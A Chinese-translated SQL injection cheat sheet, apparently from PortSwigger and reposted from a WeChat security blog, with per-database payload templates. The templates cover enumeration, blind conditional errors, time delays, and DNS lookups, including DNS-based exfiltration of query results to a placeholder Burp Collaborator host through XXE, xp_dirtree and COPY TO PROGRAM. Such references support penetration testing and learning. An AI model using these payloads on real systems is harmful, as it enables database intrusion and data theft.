文章来源;小迪安全
该SQL注入备忘录包含有用的语法示例,您可以使用这些语法来执行SQL注入攻击时经常出现的各种任务。
String concatenation 字符串串联
您可以将多个字符串连接在一起以组成一个字符串。
| Oracle | 'foo'||'bar' |
|---|---|
| Microsoft | 'foo'+'bar' |
| PostgreSQL | 'foo'||'bar' |
| MySQL | 'foo' 'bar' [Note the space between the two strings] CONCAT('foo','bar') |
Comments 注释
您可以使用注释来截断查询并删除输入之后的原始查询部分。
| Oracle | --comment |
|---|---|
| Microsoft | --comment /*comment*/ |
| PostgreSQL | --comment /*comment*/ |
| MySQL | #comment -- comment [Note the space after the double dash] /*comment*/ |
Database version 数据库类型和版本
您可以查询数据库以确定其类型和版本。在制定更复杂的攻击时,此信息很有用。
| Oracle | SELECT banner FROM v$version SELECT version FROM v$instance |
|---|---|
| Microsoft | SELECT @@version |
| PostgreSQL | SELECT version() |
| MySQL | SELECT @@version |
Database contents 数据库内容
您可以列出数据库中存在的表以及这些表包含的列。
| Oracle | SELECT * FROM all_tables SELECT * FROM all_tab_columns WHERE table_name = 'TABLE-NAME-HERE' |
|---|---|
| Microsoft | SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
| PostgreSQL | SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
| MySQL | SELECT * FROM information_schema.tables SELECT * FROM information_schema.columns WHERE table_name = 'TABLE-NAME-HERE' |
Conditional errors 条件错误
您可以测试单个boolean(布尔)条件,如果条件为true,则触发数据库错误。
| Oracle | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN to_char(1/0) ELSE NULL END FROM dual |
|---|---|
| Microsoft | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 1/0 ELSE NULL END |
| PostgreSQL | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN cast(1/0 as text) ELSE NULL END |
| MySQL | SELECT IF(YOUR-CONDITION-HERE,(SELECT table_name FROM information_schema.tables),'a') |
Batched (or stacked) queries 批处理(或堆叠)查询
您可以使用批处理查询来连续执行多个查询。请注意,在执行后续查询时,结果不会返回给应用程序。因此,该技术主要用于与盲目的漏洞有关的问题,在该漏洞中,您可以使用第二个查询来触发DNS查找,条件错误或时间延迟。
| Oracle | Does not support batched queries. |
|---|---|
| Microsoft | QUERY-1-HERE; QUERY-2-HERE |
| PostgreSQL | QUERY-1-HERE; QUERY-2-HERE |
| MySQL | Does not support batched queries. |
Time delays 时间延迟
处理查询时,可能导致数据库中的时间延迟。以下情况将导致10秒的无条件时间延迟。
| Oracle | dbms_pipe.receive_message(('a'),10) |
|---|---|
| Microsoft | WAITFOR DELAY '0:0:10' |
| PostgreSQL | SELECT pg_sleep(10) |
| MySQL | SELECT sleep(10) |
Conditional time delays 有条件的时间延迟
您可以测试单个布尔条件,并在条件为真时触发时间延迟。
| Oracle | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN 'a'||dbms_pipe.receive_message(('a'),10) ELSE NULL END FROM dual |
|---|---|
| Microsoft | IF (YOUR-CONDITION-HERE) WAITFOR DELAY '0:0:10' |
| PostgreSQL | SELECT CASE WHEN (YOUR-CONDITION-HERE) THEN pg_sleep(10) ELSE pg_sleep(0) END |
| MySQL | SELECT IF(YOUR-CONDITION-HERE,sleep(10),'a') |
DNS lookup DNS查询
您可以使数据库对外部域执行DNS查找。为此,您将需要使用Burp客户端生成将在攻击中使用的唯一Burp Collaborator子域,然后轮询Collaborator服务器以确认是否发生了DNS查找。
| Oracle | 以下技术利用XML外部实体(XXE)漏洞来触发DNS查找。该漏洞已得到修补,但是存在许多未修补的Oracle安装: SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://YOUR-SUBDOMAIN-HERE.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual 以下技术适用于完整Oracle安装,权限的提升: SELECT UTL_INADDR.get_host_address('YOUR-SUBDOMAIN-HERE.burpcollaborator.net') |
|---|---|
| Microsoft | exec master..xp_dirtree '//YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a' |
| PostgreSQL | copy (SELECT '') to program 'nslookup YOUR-SUBDOMAIN-HERE.burpcollaborator.net' |
| MySQL | 以下技术仅适用于Windows: LOAD_FILE('\\YOUR-SUBDOMAIN-HERE.burpcollaborator.net\a') SELECT ... INTO OUTFILE '\\YOUR-SUBDOMAIN-HERE.burpcollaborator.neta' |
DNS lookup with data exfiltration DNS查找与数据渗透
您可以使数据库对包含注入查询结果的外部域执行DNS查找。为此,您将需要使用Burp Collaborator客户端生成将在攻击中使用的唯一Burp Collaborator子域,然后轮询Collaborator服务器以检索任何DNS交互的详细信息,包括被泄露的数据。
| Oracle | SELECT extractvalue(xmltype('<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://'||(SELECT YOUR-QUERY-HERE)||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/"> %remote;]>'),'/l') FROM dual |
|---|---|
| Microsoft | declare @p varchar(1024);set @p=(SELECT YOUR-QUERY-HERE);exec('master..xp_dirtree "//'+@p+'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net/a"') |
| PostgreSQL | create OR replace function f() returns void as $$ declare c text; declare p text; begin SELECT into p (SELECT YOUR-QUERY-HERE); c := 'copy (SELECT '''') to program ''nslookup '||p||'.YOUR-SUBDOMAIN-HERE.burpcollaborator.net'''; execute c; END; $$ language plpgsql security definer; SELECT f(); |
| MySQL | 以下技术仅适用于Windows: SELECT YOUR-QUERY-HERE INTO OUTFILE '\\YOUR-SUBDOMAIN-HERE.burpcollaborator.neta' |
本文始发于微信公众号(渗透云笔记):SQL注入备忘录拓展
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论